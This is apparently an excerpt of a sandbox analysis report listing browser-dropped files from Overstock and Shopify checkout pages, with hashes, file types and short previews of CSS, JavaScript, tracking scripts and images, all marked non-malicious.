                                                                                                                                                                                    SHA-256:E3DA5768691C1C262AF9D504468C1048C22ED9F6926F908B6612E7D5DCD5E58F
                                                                                                                                                                                    SHA-512:E3161E41A660385E7E32BEF47F5795E12DBF38FC15C5C091D277CF1E4845DADE6CE864BACC0417F3EEC0D087CA6EC784CDA7D995EBE81AEF912AFE320AF254DF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/component-rating.css?v=111083418062392971531730157903
                                                                                                                                                                                    Preview:.star-rating-badge:empty{display:none!important}.star-rating-badge{flex:none}.rating{display:flex;align-items:center;vertical-align:bottom;line-height:inherit}.rating-stars{display:grid;grid-auto-flow:column}.icon-rating-star{color:var(--color-product-review-star);display:inline-block;width:1.4rem;height:1.4rem;fill:currentColor;vertical-align:middle;background:none;pointer-events:none;overflow:visible}.icon-rating-star-empty{color:rgba(var(--color-foreground),.3)}.rating-caption{margin-left:.3rem;display:block;top:1px;position:relative}.star-rating-link{font-size:calc(var(--font-body-scale) * 1.2rem);display:flex;align-items:center;font-weight:var(--font-bolder-weight);color:rgb(var(--color-foreground));line-height:1;flex:none}.star-rating-link .star-rating{margin-right:.5rem;position:relative;top:-1px}.jdgm-prev-badge{display:flex!important;align-items:center;vertical-align:bottom;line-height:inherit}.jdgm-prev-badge[data-average-rating="0.00"]{display:flex!important}.jdgm-prev-badge
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (8298), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8298
                                                                                                                                                                                    Entropy (8bit):5.180172095910542
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:KwjyhENneOeca4vfv4ovaRViSpS7lHW2SQdIf6:KWeya4vfQovyV+lHTU6
                                                                                                                                                                                    MD5:125C7F6C7E3F3B32CA1A15AFBBC6935E
                                                                                                                                                                                    SHA1:7066F246643259315FB97D3E85F48F4D471AB27E
                                                                                                                                                                                    SHA-256:61FA9E0A912C675E178777D2B27F6CBD482F8912A6B0AA31FA3515985A8CD626
                                                                                                                                                                                    SHA-512:15768054FE3D5EFEAD6DD96F73D54F3A935DDC246A8D727960371C543CFF923162C7530B8F47C4757F0A1028F9C0961DEE5D9D2FA983AE93434640C32F4A3020
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return function(t,n,r){return n&&e(t.prototype,n),r&&e(t,r),t}}(),n=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")},r=function(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)n[t]=e[t];return n}return Array.from(e)};e((function(e,a){"use strict";function o(e,t){if(e.length!=t.length)throw Error("Payload body and response have different number of items");e.forEach((function(e,n){var r=1;try{r=parseInt(t[n].quantity,10)||1}catch(e){console&&console.warn&&console.warn("[shop_events_listener] Error in handleBulkItemCartAddResponse: "+e.message)}s(e,r)}))}function i(e,t){for(var n=new Array(t),r=0;r<t;r++)n[r]={};var a=!0,o=!1,i=void 0;try{for(var c,s=dec
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2732
                                                                                                                                                                                    Entropy (8bit):7.224977983933819
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxXy9Bt6eq/Sx/9UGtXyTGEcyysiPPn2J6IHLhUvPIG:NBIl/Xrxi9m7/w/9UGtXyq9yK2MIHFM3
                                                                                                                                                                                    MD5:692B5C76D00805B6526A02CC63FBAEBF
                                                                                                                                                                                    SHA1:EAE1CB3F5BFD87E12330A0AE8381570E4B499135
                                                                                                                                                                                    SHA-256:D97938690321EF33061EE1E7A6413262CE0E8F123E56BE726DAB2C254654FBA8
                                                                                                                                                                                    SHA-512:B59301A985786A5E3A61408D3D3778638CDC70FB42B334103687A9B2A26C6222CA97B9AD6904FCAEAC17C7E7484300979F5A53E017B2075C70803BBFBFB9CAFF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................X......O....$.s..&..1.......F...1..hd.<~......7.&.....`k-.W_?...........z...._h.*...~..;8..&.g;Z..N3.&,.os......S.k7^.......Q....[Zy.{
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 250x250, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):9429
                                                                                                                                                                                    Entropy (8bit):7.760745971055509
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:NWfsjKhfexBC55GI9jiGhcyBhyjeUC6PFJzLJExtALmWQ74:N7LAIefh53yje6F1ItOmW04
                                                                                                                                                                                    MD5:B1C53895DDBF00E741D17AD8D0603C6D
                                                                                                                                                                                    SHA1:3DB7FD3DC22C3D4A5A637465E4290C7962602303
                                                                                                                                                                                    SHA-256:55FF052BF5E260A495D6DEBA3E0BC53125F522FEA1C41039413F161275106348
                                                                                                                                                                                    SHA-512:C48E1C12F97C6AEDAA49E5CEE7972432F764F0B4619C9BC2078DAF7817D61BA9095B44CEFFF47198257A16A3F95A43B023C2F0B3994DFFCE9D33238E0AE08187
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........................................................................................................................................................................................................6.y...9(.....LD.K.}..s.P.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1515
                                                                                                                                                                                    Entropy (8bit):6.137926803249805
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZeEoADrU4PUELfv6S521a3ZFkNkmh3:NBIl/XflVxEEfPP3Ls12ZFkNkW3
                                                                                                                                                                                    MD5:B9D83700B3EDFE0A1B4B967A5C8D0BE1
                                                                                                                                                                                    SHA1:C27EBB7ABB7DC70EB1E73C5055807FD22BB4166A
                                                                                                                                                                                    SHA-256:840C4D61DAE2A8E2B93CB4E74A1C39FCE6B2AC1CC07435DE644B28586014559A
                                                                                                                                                                                    SHA-512:52E475560EAF00EB68AF9E6D98720B6D73CCC82F78A68FB5084A8DBBA2A54EE742F2B0CC5729285037613FB4EB119AAEDC92861CA2722E254C20C683B7A22996
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..........................................................................,..............2s;..P.G.....L.<.........(...........(........5.......................1q...!AQ". 23a.....#0R..Bbr.........?..9...}._...a0`.X.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61991)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):62896
                                                                                                                                                                                    Entropy (8bit):5.53505091417112
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:hb22jlveiRbFUZRAYLqcSoTQpcL7ezvGeqOUIuzQP7j5Pf5P5Ccu0RI525uhLFiB:H1SkBQwueqNIu4xP8UifnLuqYkI7W+
                                                                                                                                                                                    MD5:DC00250CFCB878EC25D3A1B746D436D6
                                                                                                                                                                                    SHA1:862F622E0802E5F56C46A59FFDEAF7DA0BF51D57
                                                                                                                                                                                    SHA-256:D13C08C5D5F8CC0FF60F7E0820B5622E4310019A23210CABAB220B0F3312C4DA
                                                                                                                                                                                    SHA-512:CAE8C0245B7A7728678F93F067F118406E1196A9C60773AF98965805EA0F7C8FE859ADC4A7CDF4E4368B32E5FD936D5595BAA03CA62FA8B1F612D9C82834729C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/DeliveryMethodSelectorSection.HuQ_vE9w.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-ShopPayVerificationSwitch.BlUYB-_q.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","publishMessage.CX0yXme-.js","useUnauthenticatedErrorModal.AwvSMfsF.js","index.BImg1G4g.js","LegacyVaultedShippingMethods.CLlWtWZU.js","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css","SubscriptionPriceBreakdown.CxrCP-xw.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","MarketsProDisclaimer.D4Dihv-c.js","ShopPayLogo.MmDQrsit.js","assets/ShopPayLogo.D_HPU8Dh.css","index.2zVq00Bx.js","PickupPointCarrierLogo.Dit2gzD9.js","assets/PickupPointCarrierLogo.C0wRU6wV.css","hooks.CJ9fMJ3B.js","assets/ShopPayVerificationSwitch.DVQdwG9J.css","component-GooglePayButton.C5e6CBnC.js","useGooglePaySdk.VumOquMs.js","assets/GooglePayButton.C9QQ9NQG.css","component-FacebookPayButton.fVrCKwgB.js","assets/FacebookPayButton.CTYBjZ8U.css"])))=>i.map(i=>d[i]);.import{m as ee,at as U,c0 as ce,e as L,Z as Oe,cx as Ve,cB as on,T as H,c as ue,aO as Q,ji as en,j
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2139)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2140
                                                                                                                                                                                    Entropy (8bit):5.141103381880927
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:EGQIEvKlglnWSvOjAjQMjQklPE6Dy7sZl1U:EG+v6FS4AjXjpPESYsVU
                                                                                                                                                                                    MD5:B610A407E7105684FCA291AE126EE000
                                                                                                                                                                                    SHA1:52DABB9B2612EDC46EE150F13BBC71A1349EECD8
                                                                                                                                                                                    SHA-256:F68A24E652586F1F1A6EACBBBA232203787CCD0009FFC4CB990F3CDE37EE4930
                                                                                                                                                                                    SHA-512:59C5F2B434ECF6C193457CE588D52EC9317FF5248EC2AED7B279EF3952EFEB7424D7FF4BA025C13906BEE229457EF1685BE17ADE2CC343D7D501BC19F44D73D7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useIsOriginatedFromShop.7toB9y1y.js
                                                                                                                                                                                    Preview:import{aO as m,at as o,q as l,kR as c,nn as p,bR as y,bk as v,d as f,br as g,y as b,a as w,bt as E,bo as h,j as M}from"./app.DfgMZONA.js";function I(){const e=m(),{directPaymentErrors:t,paymentLines:n}=o();return l((i,a)=>{if(Object.values(i).every(r=>r==null)&&!a)return;const s=n.peek().find(({method:r})=>r.type==="direct");if(s){const d=s.method.paymentMethodIdentifier;e.write(t.paymentMethodIdentifier,d)}e.write(t.number,i.number?{message:i.number,origin:"client"}:void 0),e.write(t.name,i.name?{message:i.name,origin:"client"}:void 0),e.write(t.expiry,i.expiry?{message:i.expiry,origin:"client"}:void 0),e.write(t.issueDate,i.issue_date?{message:i.issue_date,origin:"client"}:void 0),e.write(t.issueNumber,i.issue_number?{message:i.issue_number,origin:"client"}:void 0),e.write(t.verificationValue,i.verification_value?{message:i.verification_value,origin:"client"}:void 0),e.write(t.general,void 0)},[t,e,n])}function N(){const e=m(),{directPaymentErrors:t}=o();return l(()=>{e.write(t.payme
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):4.301508290129998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:m8ZJ570T4X7:m+5X7
                                                                                                                                                                                    MD5:AD8B6F08655797587CDEC719A94EFE59
                                                                                                                                                                                    SHA1:182ADF5A140796F81E930649D05654DBF22FD5B7
                                                                                                                                                                                    SHA-256:77D5FE96DEFD6C8C1E3B0466B4827CF83DC7E5C727A10177E115D25132FA86F6
                                                                                                                                                                                    SHA-512:519A8EA7CE2ED8661CC72D58BC0C02E721EF8E64608F4D2E26A56A970D43EBBF21BDF579C543EE1DFD667DA8F87467C60111A3E6D246D435A5C2D066AB88EFA3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window['google_noFurtherRedirects'] = true;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (27068)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):46520
                                                                                                                                                                                    Entropy (8bit):5.342606603321526
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:dgLivxJv6rqgLInXZZZx6+VWjq0Lui7A9GRUkrpBRAuME+nIFB61dZebJrIWDpNM:WLivLv6rLLInXZZZx6+VWu0LuisYTpbU
                                                                                                                                                                                    MD5:279F66B5BC2167F4D93BD0ECF1A8E894
                                                                                                                                                                                    SHA1:0CB86EBD91440FA12CE53EBF14566AF5390CB0BB
                                                                                                                                                                                    SHA-256:A0E952ABDDCB7C81AE6F848B6216A10757D84DAD5832B7362FA08DCD4644C9F6
                                                                                                                                                                                    SHA-512:BAB0920CAB0D478A3376F3F965C89C8A650E950083FFA7ADF8BAEE1D36BD0D0ADF43DABF4785E9D96E66587BBAAECE4713202FF3AE1D5D8A08568E0925FC6CC0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://g28hawu9.micpn.com/p/js/1.js
                                                                                                                                                                                    Preview:!function(){var Sizzle=(function(e){var t,n,r,i,o,u,l,a,c,s,f,d,p,h,g,m,y,w,v,b="sizzle"+1*new Date,N=e.document,x=0,C=0,E=oe(),D=oe(),A=oe(),T=function(e,t){return e===t&&(f=!0),0},S={}.hasOwnProperty,L=[],I=L.pop,q=L.push,B=L.push,R=L.slice,$=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},k="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",H="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",M="\\["+P+"*("+H+")(?:"+P+"*([*^$|!~]?=)"+P+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+H+"))|)"+P+"*\\]",F=":("+H+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+M+")*)|.*)\\)|)",O=new RegExp(P+"+","g"),j=new RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),z=new RegExp("^"+P+"*,"+P+"*"),G=new RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),U=new RegExp("="+P+"*([^\\]'\"]*?)"+P+"*\\]","g"),V=new RegExp(F),X=new RegExp("^"+H+"$"),J={ID:new
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):36
                                                                                                                                                                                    Entropy (8bit):3.0708241287951763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:M3VllRCXk6pswn:ElakCsw
                                                                                                                                                                                    MD5:F729966732570537B1F59424F6F06755
                                                                                                                                                                                    SHA1:EEA047C3C30C3C5AFF350D10B0EBE35802C56528
                                                                                                                                                                                    SHA-256:130B6263E0272B64DB46C42CB3DA57F47CED7317289CE3B0658A5568178CD5EC
                                                                                                                                                                                    SHA-512:A0321512172336B4E759801AFE99AE30BFB278458BBE2E8BD13D8E168962C055FA48E1FA255C7AFD0CC88DD61B564B57B5240F76EF70CE99C22C3B2F2615289F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF87a.............,...........L..;.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1115)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1223
                                                                                                                                                                                    Entropy (8bit):5.078457174067644
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:S8RCRmxg8t+iex0pOa18dLBOdLDccA9dOxO6axNRT/8:nxy9J6laxNRT/8
                                                                                                                                                                                    MD5:420A9A0BF6108C68AFB43270ACA651EB
                                                                                                                                                                                    SHA1:7F47C9FF91D7F29A66403C132952819462BCF241
                                                                                                                                                                                    SHA-256:592416C8AF97C0B5011DB5EE5DA363A4557928DE48129874FD94796FC9A994CA
                                                                                                                                                                                    SHA-512:E0C2422A41069FC2449A68CBA08EB8622F049A08796A86E757CAB9087BFBB6608DFBCDABEC773200DE69F549E15D477FF0B549377834411BEA266A56A761BCFC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/featured-collection.css?v=64892234005846914921730157903
                                                                                                                                                                                    Preview:@media (min-width: 769px){.featured-collection-info--carousel{margin-bottom:10px}.featured-collection-info{flex-basis:280px}.featured-collection-info+.container{max-width:calc(100% - 280px)}.featured-collection-info+.carousel{max-width:calc(100% - 280px)}.featured-collection-info+.carousel .slider{width:100%;margin-inline-start:0}.featured-collection-container{max-width:calc(var(--page-width, 1320px) + var(--gutter) * 2);padding-inline-start:var(--gutter)}.featured-collection--sticky{position:-webkit-sticky;position:sticky;top:var(--header-end-padded, 0);transition:top .3s}.featured-collection--sticky-fill{min-height:var(--card--product-height, auto)}}@media (min-width: 1024px){.featured-collection-info{flex-basis:350px;margin-inline-end:var(--gutter-md, 32px)}.featured-collection-info+.container{max-width:calc((100% - 350px) - var(--gutter-md, 32px));padding:0}.featured-collection-info+.carousel{max-width:calc((100% - 350px) - var(--gutter-md, 32px))}.featured-collection-container{pad
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51385
                                                                                                                                                                                    Entropy (8bit):5.293328685395304
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:IaOFhhRC5JFhLjfRysgLzQynDw5YyDMFW8KQ:IaOFnR2DRszQKaoWtQ
                                                                                                                                                                                    MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                                    SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                                    SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                                    SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):33483
                                                                                                                                                                                    Entropy (8bit):3.8154404016293837
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:LR2dMhepRHzIGHSoZzQk79ydGRsKsXENJGZ8rqjPATxR5RsKsXENJGZ8rqjPATx/:LRRezzIIRydHXkSATx6XkSATxPH
                                                                                                                                                                                    MD5:05B3D80ABB45502FA4560A8A6EF0246E
                                                                                                                                                                                    SHA1:9F3D5FA4DB10C44683125C061FC5BEB0D491DECE
                                                                                                                                                                                    SHA-256:E82C7BE21012F80D2E33B095DE60F2A229AECDE0CA28F0B14EEDC58605B995F6
                                                                                                                                                                                    SHA-512:A11E1042A40AAFCDDE1E01FF2CBC908008D7943C3287FB4FC07CA852BAAC03EE92A2816A81AC1DE390A01BDBE9DE221D9D4838D0F10E8EA7D3046441F47246E9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_3048_9465)">.<path d="M71.6744 239.794H52.5088V205.971C52.5088 205.615 52.2178 205.324 51.8603 205.324H49.6486C49.291 205.324 49 205.615 49 205.971V241.022C49 241.378 49.291 241.669 49.6486 241.669H71.6744C72.0319 241.669 72.323 241.378 72.323 241.022V240.441C72.323 240.084 72.0319 239.794 71.6744 239.794Z" fill="#10595B"/>.<path d="M79.9308 205.324H82.1425C82.5 205.324 82.7911 205.615 82.7911 205.971V241.022C82.7911 241.378 82.5 241.669 82.1425 241.669H79.9308C79.5732 241.669 79.2822 241.378 79.2822 241.022V205.971C79.2822 205.615 79.5732 205.324 79.9308 205.324Z" fill="#10595B"/>.<path d="M122.527 205.623C122.411 205.432 122.203 205.324 121.979 205.324H121.338C121.089 205.324 120.856 205.474 120.748 205.706L106.788 236.036L93.5089 205.714C93.4091 205.482 93.168 205.324 92.9102 205.324H90.5322C90.316 205.324 90.1081 205.432 89.9917 205.615C89.867 205.797 89.8504
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 516x516, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):15231
                                                                                                                                                                                    Entropy (8bit):7.872728506900219
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:iqWJ0/FCfQY409HmqfiQg3mYM034QeaWfSaxkeV:P9ofQPyhgBM03qfSaxx
                                                                                                                                                                                    MD5:97EF8C787B64C2B643BF50B29AF20845
                                                                                                                                                                                    SHA1:69EB53EEBCE410E31AF45AF6DAD9B6E3321C05DD
                                                                                                                                                                                    SHA-256:D667490CCA85317954C0E9B579D3E5313874CBF431D77791BE5ABCE515A79CC8
                                                                                                                                                                                    SHA-512:441ACBAE1C68A973DA644F30B9357D04F1B6881417D8D078F45BE3D90DF964C8BA004D49CC7C471696B32CCACEAE9D073BEE752BBF26FBCA6CAEA51EEB049A7A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................!.........!.2.$.'.$.'.$.2.M.0.8.0.0.8.0.M.D.R.C.>.C.R.D.z._.U.U._.z...v.p.v.....................x................................!.........!.2.$.'.$.'.$.2.M.0.8.0.0.8.0.M.D.R.C.>.C.R.D.z._.U.U._.z...v.p.v.....................x..........."........../............................................................H....................................................................................HG.[.|..pwq...%.\.ur.US..#...9..g....o.2Jp.`............|k.7.~...t..#.^.+...n.....X.c.!1]`.`..fM.....J..&A.ZJ.3P,...........(lt....J.yZK.L.\...a.A....U..).X.VY..kn........,.............[.,...k..o.Yl3.t.U..I..U.&X..K.R.]4.[L.c...W..63...u_a............q....G..GQ..l$...2.n.U.&RK+..0..m....W.a1Yi...x.39.s.Jk...2.;.H..P,........8..}o....Y.}e.+..W.e.P...Mh..Yy.5.U....M...5.F...lq.d.E......1..~~./z.s.~=..........\<D.b.l..1..V.b7.....+>.....q.k.......Mk.^...{.!M.V.kJ......~......A\`.jf]%.X.........%E..:.^8..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1756
                                                                                                                                                                                    Entropy (8bit):4.656726233246248
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2ffmyCLwyk3q4nsrqH2B6PykiiNRWZ32IGMSGbbZcmsFrEP2Pr9Tf0W2dTZ+NEHT:wD3qAs+rbwMlGbFWLT9f0W2dZNw2
                                                                                                                                                                                    MD5:0FBD4D9292EC8B79CA160BBD14CC918E
                                                                                                                                                                                    SHA1:560A0731A30E5AD3E9C9597202BBEA3212A7D56E
                                                                                                                                                                                    SHA-256:63B5835145D9445D62B58EA71139A7A2728D8D6D92578568B980AC7AAEABBC23
                                                                                                                                                                                    SHA-512:81A12FF8A509402D86916CC0A3C53C38711EA00CC39CC69529553792332EE6C85C5DC7689D085426ECE8B275D19D2EE12A26984843022F4AEE455D48271C04F4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', true, false, false, false, false);..(function(w,d,s,i) {.. var c=d.currentScript;.. if (c) {.. var uo = c.getAttribute('data-ueto');.. if (uo && w[uo] && w[uo].uetConfig && w[uo].uetConfig.deBlock === true).. return;.. }.. var f,j; f=d.getElementsByTagName(s)[0]; j=d.createElement(s); j.async=true;.. j.src='https://bat.bing.com/p/insights/t/'+i;.. j.onload = function () {.. if (!c) return;.. var co = function(u) { return u && typeof u === 'object' && !(u instanceof Array) && u.beaconParams && u.beaconParams.mid && w.webinsights; };.. var r = 40;.. var cl = function() {.. if (r-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):20829
